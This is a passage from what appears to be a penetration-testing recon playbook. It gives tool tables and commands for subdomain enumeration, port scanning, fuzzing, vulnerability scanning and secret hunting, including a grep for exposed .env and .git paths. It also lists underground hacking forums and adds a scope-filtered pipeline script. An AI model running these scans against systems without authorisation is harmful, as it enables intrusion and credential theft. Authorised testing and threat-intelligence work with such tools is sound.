Recon &amp;amp; Subdomains
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Usage&lt;/th&gt;
&lt;th&gt;Installation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;SimpleReconSubdomain&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;50 sources (39 passive + 11 active), async, multi-output&lt;/td&gt;
&lt;td&gt;&lt;code&gt;git clone https://github.com/MrCl0wnLab/SimpleReconSubdomain &amp;amp;&amp;amp; pip install -r requirements.txt&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;subfinder&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Subdomain discovery&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;amass&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Full recon (ASN/Whois)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install -v github.com/owasp-amass/amass/v4/...@master&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;httpx&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;HTTP probe (which subdomains respond)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;dnsx&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;DNS toolkit&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h4 id="simplereconsubdomain--the-most-complete-subdomain-recon-tool" &gt;
&lt;div&gt;
&lt;a href="#simplereconsubdomain--the-most-complete-subdomain-recon-tool"&gt;
###
&lt;/a&gt;
SimpleReconSubdomain — The Most Complete Subdomain Recon Tool
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;With 50 sources (39 passive + 11 active) in async Python, it is the most comprehensive tool for subdomain enumeration. It does not depend on external binaries.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Installation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git clone https://github.com/MrCl0wnLab/SimpleReconSubdomain
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;cd&lt;/span&gt; SimpleReconSubdomain
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install -r requirements.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Configure API keys in config/api_keys.json:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# alienvault_otx, virustotal, securitytrails, shodan, censys_id/secret,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# github_token, chaos_key, leakix_token, fullhunt_token, intelx_key,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# publicwww_key, bevigil_key, hunterhow_key, merklemap_key, fofa_key, netlas_key&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Basic usage&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py -d target.com
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Fast profile (only no-auth sources)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py -d target.com --profile fast
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# OSINT profile + live verification + takeover detection&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py -d target.com --profile osint --verify-live
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# With brute-force + two-pass validation (PureDNS-style)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py -d target.com &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; --brute wordlists/subdomains-top1million-20000.txt &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; --resolvers https://public-dns.info/nameservers-all.txt &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; --check-resolvers --validate-resolvers --threads &lt;span style="color:#ef9f76"&gt;30&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# NDJSON output (pipe-friendly with jq)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py -d target.com --verify-live -o ndjson | jq &lt;span style="color:#a6d189"&gt;&amp;#39;select(.takeover != null)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Continuous monitoring (internal cron, no systemd)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py -d target.com --profile fast --db target.db --quiet &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; --watch-add &lt;span style="color:#a6d189"&gt;&amp;#34;0,15,30,45 * * * *&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py --watch &lt;span style="color:#737994;font-style:italic"&gt;# starts the scheduler&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Interactive network map (vis.js) with all targets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py -d target.com --verify-live -o html --outfile map.html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Markdown report ready for client&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py -d target.com --verify-live -o markdown --outfile report.md
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Active sources included&lt;/strong&gt; (they send no intrusive requests to the target, only legitimate DNS queries):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;nsec_walk&lt;/code&gt; — DNSSEC NSEC zone walking (enumerates entire zone without zone transfer)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;srv_enum&lt;/code&gt; — ~70 SRV prefixes (_http._tcp, _ldap._tcp, _kerberos._tcp&amp;hellip;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;spider&lt;/code&gt; — BFS crawler with sourcemap mining&lt;/li&gt;
&lt;li&gt;&lt;code&gt;robots_sitemap&lt;/code&gt; — recursive robots.txt + sitemap.xml&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ptr_sweep&lt;/code&gt; — PTR sweep on target IP /24s&lt;/li&gt;
&lt;li&gt;&lt;code&gt;asn_sweep&lt;/code&gt; — ASN lookup → all CIDRs → PTR sweep&lt;/li&gt;
&lt;li&gt;&lt;code&gt;vhost_probe&lt;/code&gt; — Virtual host brute-force (130+ words)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;caa_enum&lt;/code&gt; — CAA iodef mining (leaks internal hostnames)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;dns_mining&lt;/code&gt; — SPF/DMARC/MX record mining&lt;/li&gt;
&lt;li&gt;&lt;code&gt;zone_transfer&lt;/code&gt; — AXFR on all nameservers&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ns_brute&lt;/code&gt; — Secondary NS discovery&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Takeover detection&lt;/strong&gt;: 22 services (aws-s3, github-pages, heroku, netlify, fastly, shopify&amp;hellip;), 11 WAF/CDN fingerprints (cloudflare, akamai, cloudfront, incapsula&amp;hellip;).&lt;/p&gt;
&lt;h4 id="forum--underground-intelligence-hunting" &gt;
&lt;div&gt;
&lt;a href="#forum--underground-intelligence-hunting"&gt;
###
&lt;/a&gt;
Forum &amp;amp; Underground Intelligence Hunting
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;For CTI (Cyber Threat Intelligence), identify forums where target data may be sold:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List of underground hacking forums for monitoring:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;forums &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;xss.is&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;ramp4u.io&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;breachforums.st&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;exploit.in&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;sinister.ly&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;nulled.to&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;cracked.io&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;leakbase.io&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;darkforums.net&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;evilzone.org&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;hackforums.net&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;lolz.live&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;procrdmx.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;turk-hackteam.com&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;validmarket.io&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;craxpro.io&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;voided.to&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Search techniques on these forums:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Google dork: site:forum.com &amp;#34;target.com&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Telegram: search for &amp;#34;target.com&amp;#34; in leak channels&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Twitter/X: search for &amp;#34;target.com breach&amp;#34; OR &amp;#34;target.com leak&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Ahmia: search the dark web&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;⚠️ ETHICAL USE&lt;/strong&gt;: For defensive research and CTI only. Never participate in illegal activities. Use isolated VMs only.&lt;/p&gt;
&lt;h3 id="scanning" &gt;
&lt;div&gt;
&lt;a href="#scanning"&gt;
##
&lt;/a&gt;
Scanning
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Usage&lt;/th&gt;
&lt;th&gt;Installation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;RustScan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Fast port scan&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cargo install rustscan&lt;/code&gt; or Docker &lt;code&gt;rustscan/rustscan:2.1.1&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Masscan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Internet-scale port scan&lt;/td&gt;
&lt;td&gt;&lt;code&gt;git clone https://github.com/robertdavidgraham/masscan &amp;amp;&amp;amp; make&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Nmap&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Deep enumeration&lt;/td&gt;
&lt;td&gt;&lt;code&gt;apt install nmap&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="secret-scanning" &gt;
&lt;div&gt;
&lt;a href="#secret-scanning"&gt;
##
&lt;/a&gt;
Secret Scanning
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Usage&lt;/th&gt;
&lt;th&gt;Installation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;trufflehog&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Secret scan in repositories&lt;/td&gt;
&lt;td&gt;&lt;code&gt;pip install trufflehog&lt;/code&gt; or Docker&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;gitleaks&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Git secret detection&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/gitleaks/gitleaks/v8@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;git-hound&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Git commit dorking&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/tillson/git-hound@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="web--api" &gt;
&lt;div&gt;
&lt;a href="#web--api"&gt;
##
&lt;/a&gt;
Web &amp;amp; API
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Usage&lt;/th&gt;
&lt;th&gt;Installation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;katana&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Fast web crawler&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/projectdiscovery/katana/cmd/katana@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;waybackurls&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Wayback historical URLs&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/tomnomnom/waybackurls@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;gau&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Get All URLs&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/lc/gau/v2/cmd/gau@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ffuf&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Web fuzzing&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/ffuf/ffuf/v2@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;nuclei&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Vulnerability scanning&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;wpscan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;WordPress scanner&lt;/td&gt;
&lt;td&gt;&lt;code&gt;gem install wpscan&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="cloud" &gt;
&lt;div&gt;
&lt;a href="#cloud"&gt;
##
&lt;/a&gt;
Cloud
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Usage&lt;/th&gt;
&lt;th&gt;Installation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;cloudfox&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AWS/GCP/Azure enumeration&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/BishopFox/cloudfox@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;s3scanner&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Open S3 buckets&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/sa7mon/s3scanner@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="ideal-pipeline" &gt;
&lt;div&gt;
&lt;a href="#ideal-pipeline"&gt;
##
&lt;/a&gt;
Ideal Pipeline
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Subdomains&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;subfinder -d target.com | httpx -o alive.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Ports&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cat alive.txt | &lt;span style="color:#ca9ee6"&gt;while&lt;/span&gt; &lt;span style="color:#99d1db"&gt;read&lt;/span&gt; url; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rustscan -a &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$url&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; -p 21,22,80,443,3000,3306,5000,5432,6379,8080,8443,9000,9090,27017
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Historical URLs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gau target.com | grep -E &lt;span style="color:#a6d189"&gt;&amp;#34;\.env|\.git|api|admin|storage|wp-json|graphql&amp;#34;&lt;/span&gt; | sort -u
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Vulnerability scan&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;nuclei -l alive.txt -t ~/nuclei-templates/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 5. Crawler&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;katana -u https://target.com -o urls.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 6. Directory fuzzing&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ffuf -u https://target.com/FUZZ -w ~/wordlists/common.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 7. Secrets in repositories&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;trufflehog github --repo&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;https://github.com/org/repo
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
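&lt;p&gt;The pipeline above as one script, added here as an example and not taken from the playbook: the same tools, plus a scope filter so the active steps never touch a host outside the engagement, and pure-text helpers for the URL-to-host and interesting-path steps that can be checked without a network. Assumed, not from the page: the helper names (&lt;code&gt;urls_to_hosts&lt;/code&gt;, &lt;code&gt;in_scope&lt;/code&gt;, &lt;code&gt;interesting_urls&lt;/code&gt;, &lt;code&gt;run_recon&lt;/code&gt;), the &lt;code&gt;RUN_RECON&lt;/code&gt; environment gate, the &lt;code&gt;recon_&lt;/code&gt;-prefixed output directory and the sample hostnames used in the comments.&lt;/p&gt;

```shell
#!/bin/sh
# Added example, not the playbook's own code: the recon pipeline as a script
# with scope control. Assumes subfinder, httpx, rustscan, gau and nuclei are
# on PATH when RUN_RECON=1; the three helpers below need no network at all.

# httpx emits URLs (scheme://host[:port]/path); rustscan and masscan want bare
# hosts or IPs. Reads stdin or the files given as arguments, one host per line.
urls_to_hosts() {
  sed -E 's#^[A-Za-z]+://##; s#[:/].*$##' "$@" | sed '/^$/d' | LC_ALL=C sort -u
}

# Keep only hosts that are an in-scope apex domain or a subdomain of one.
# "evil-target.com" must NOT pass for "target.com", so the match is anchored
# on a dot or on the start of the line. Apex domains are the arguments.
in_scope() {
  pattern=""
  for apex in "$@"; do
    esc=$(printf '%s' "$apex" | sed 's/\./\\./g')
    pattern="${pattern}${pattern:+|}(^|\\.)${esc}\$"
  done
  grep -E "$pattern"
}

# The paths that paid off most in the field, case-insensitive, deduplicated.
interesting_urls() {
  grep -iE '\.env|\.git|api|admin|storage|wp-json|graphql' "$@" | LC_ALL=C sort -u
}

# Glue: one output directory per apex, every active step fed only by scoped hosts.
run_recon() {
  apex="$1"
  out="recon_$apex"
  mkdir -p "$out"
  subfinder -d "$apex" -silent | in_scope "$apex" | httpx -silent -o "$out/alive.txt"
  urls_to_hosts "$out/alive.txt" | while read -r host; do
    rustscan -a "$host" -p 21,22,80,443,3000,3306,5000,5432,6379,8080,8443,9000,9090,27017
  done | tee "$out/ports.txt"
  gau "$apex" | interesting_urls | tee "$out/urls.txt"
  nuclei -l "$out/alive.txt" -rl 50 -o "$out/nuclei.txt"
}

# Only fire the active tools when explicitly asked: RUN_RECON=1 ./recon.sh target.com
if [ "${RUN_RECON:-0}" = 1 ]; then
  run_recon "${1:?usage: RUN_RECON=1 recon.sh apex-domain}"
fi
```

&lt;p&gt;The scope filter sits between subfinder and httpx on purpose: passive sources return wildcard and third-party hosts that share a suffix with the target, and the first request you send to one of them is the one that ends up in someone else&amp;rsquo;s logs. Sorting with &lt;code&gt;LC_ALL=C&lt;/code&gt; keeps the dedup stable across machines, which matters when you diff today&amp;rsquo;s output against last week&amp;rsquo;s.&lt;/p&gt;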
&lt;h2 id="30-technique-effectiveness-summary" &gt;
&lt;div&gt;
&lt;a href="#30-technique-effectiveness-summary"&gt;
#
&lt;/a&gt;
30. TECHNIQUE EFFECTIVENESS SUMMARY
&lt;/div&gt;
&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;Yield&lt;/th&gt;
&lt;th&gt;Effort&lt;/th&gt;
&lt;th&gt;Priority / when to run&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.env&lt;/code&gt; + &lt;code&gt;.git&lt;/code&gt; testing&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
